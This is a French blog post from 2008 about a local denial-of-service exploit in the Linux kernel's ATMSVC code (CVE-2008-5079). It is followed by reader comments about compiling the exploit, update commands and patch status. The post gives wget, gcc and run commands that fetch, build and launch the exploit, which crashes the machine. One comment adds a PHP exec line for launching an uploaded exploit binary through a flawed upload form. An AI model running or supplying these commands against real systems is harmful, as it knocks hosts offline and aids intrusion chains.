Linux : ATMSVC Local Denial of Service Exploit


video
Une faille de sécurité a été découverte pour les versions du noyau Linux inférieures ou égales à la 2.6.27.8. L'exploit permet à un simple utilisateur d'une machine Linux quelconque de créer un déni de service local (kernel infinite loop). La seule solution pour contrer ce type d'attaque est de mettre à jour votre système.

Exemple d'utilisation de l'expoit :

wget www.tux-planet.fr/public/hack/exploits/kernel/atmsvc-local-denial-of-service-exploit.c
gcc -o atmsvc-local-denial-of-service-exploit atmsvc-local-denial-of-service-exploit.c
./atmsvc-local-denial-of-service-exploit

Ceci provoquera le plantage total de la machine Linux, obligeant l'administrateur à effectuer un reboot hardware.

Pour mettre à jour votre système :

  • distribution à base de debian : sudo aptitude update && sudo aptitude upgrade
  • distribution à base de rpm : yum update

17 Commentaires pour "Linux : ATMSVC Local Denial of Service Exploit"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    C'est nul ... ça compile pas chez moi ^^

    /usr/include/linux/atm.h:210: erreur: expected specifier-qualifier-list before «uint32_t»

    :( ça aurait été drôle
    En attendant, je met à jour mon noyau ;) merci pour l'info

    theClimber , le 10 décembre 2008 à 19:16
  •  

    La bonne question que je me pose: les systèmes mac osx étant sur une base unix, sont il touchés ?
    J'ai une 404 not found sur ton fichier, c'etait un exemple ou tu l'as retiré ? j'aimerais testé en fait

    clawfire , le 10 décembre 2008 à 19:19
  •  

    @theClimber : j'ai testé sur une Fedora et une Ubuntu pas à jour. J'ai pas eu de problème de compilation. Il doit te manquer des paquets liés au langage c ou aux compilateurs (gcc). Ou peut-être le paquet linux-header ...

    @clawfire : pas d'erreur 404 chez moi. L'url donnée est valide. Sinon je sais pas trop pour Mac. En générale, les failles de Linux ne concernent pas cette OS.

    pti-seb , le 10 décembre 2008 à 19:23
  •  

    Je viens de tester (j'avais oublié le c après le . :D) et ca ne compile même pas, alors l'exécution du pense bien :D

    clawfire , le 10 décembre 2008 à 19:28
  •  

    merci d'avoir fait planter mon macbook!!! ^^
    kernel mis à jour, merci pour l'info

    inalgnu , le 10 décembre 2008 à 20:27
  •  

    Au passage, je précise : c'est surtout dans le cadre de serveurs web que ce genre d'attaque est à prendre au sérieux. Car en combinant cet exploit à un autre, ça peut faire des ravages.

    Exemple : un hackeur exploit une faille php ou apache. Il se retrouve ensuite sur la machine avec un shell en tant que user "Apache". Il peut ensuite faire un déni de service sans problème via cet méthode.

    pti-seb , le 10 décembre 2008 à 20:31
  •  

    Si j'ai bien compris il faut déjà être connecté sur la machine pour planter le système ?

    tetageek , le 10 décembre 2008 à 20:33
  •  

    @inalgu : tu as un un kernel panic ? moi ça compile même pas ...

    clawfire , le 10 décembre 2008 à 20:39
  •  

    bonsoir, je tiens quand même à signaler que cette mise à jour posera des problèmes pour les utilisateurs de vmwareworkstation...
    J'ai dû faire un downgrade du noyaux pour l'utiliser. D'autres logiciels auraient-ils le même soucis avec un upgrade?

    mystery_inter , le 10 décembre 2008 à 20:49
  •  

    @clawfire : tu sembles confondre Linux et Unix. Mac OS X et Linux sont des systèmes Unix mais les failles de Linux restent chez Linux.

    Moe , le 10 décembre 2008 à 21:22
  •  

    #define uint32_t unsigned int

    Ça compilera mieux.

    onl , le 10 décembre 2008 à 21:44
  •  

    j'ai comme un petit problème là, après mis a jour du kernel j'arrive toujours a faire planter le système, c'est pas très normal, la dernière version du noyau c'est bien la 2.6.27.7-134?

    inalgnu , le 10 décembre 2008 à 22:55
  •  

    @inalgu : The latest stable version of the Linux kernel is: 2.6.27.8 tu peux retrouver ça sur http://www.kernel.org

    mystery_inter , le 10 décembre 2008 à 23:46
  •  

    @tetageek : oui et non. Ce genre de technique peut-être utilisé via php, sans shell, donc sans accès sur le machine. Un hackeur peut uploader l'exploit déjà compilé (via un formulaire d'upload mal conçu) et le lancer via la page php :

    < ?php exec(./atmsvc-local-denial-of-service-exploit); ?>

    @inalgnu @mystery_inter : la faille est peut-être pas encore corrigé chez Fedora. J'ai été rapide sur la publication de cet exploit. :-)

    pti-seb , le 11 décembre 2008 à 01:14
  •  

    Note that this is fixed in Fedora 10 kernel 2.6.27.8-143 as well.

    You can find out more at:
    https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-5079

    Eugene Teo , le 11 décembre 2008 à 04:45
  •  

    @Eugene Teo : ok, thank you for this information.

    pti-seb , le 11 décembre 2008 à 10:12
  •  

    Heu, chez ovh quand on fait un aptitude update, upgrade et bien la correction du noyau n'est pas déployé. (debian inside :-) )

    tetageek , le 11 décembre 2008 à 11:33

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité redhat red hat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum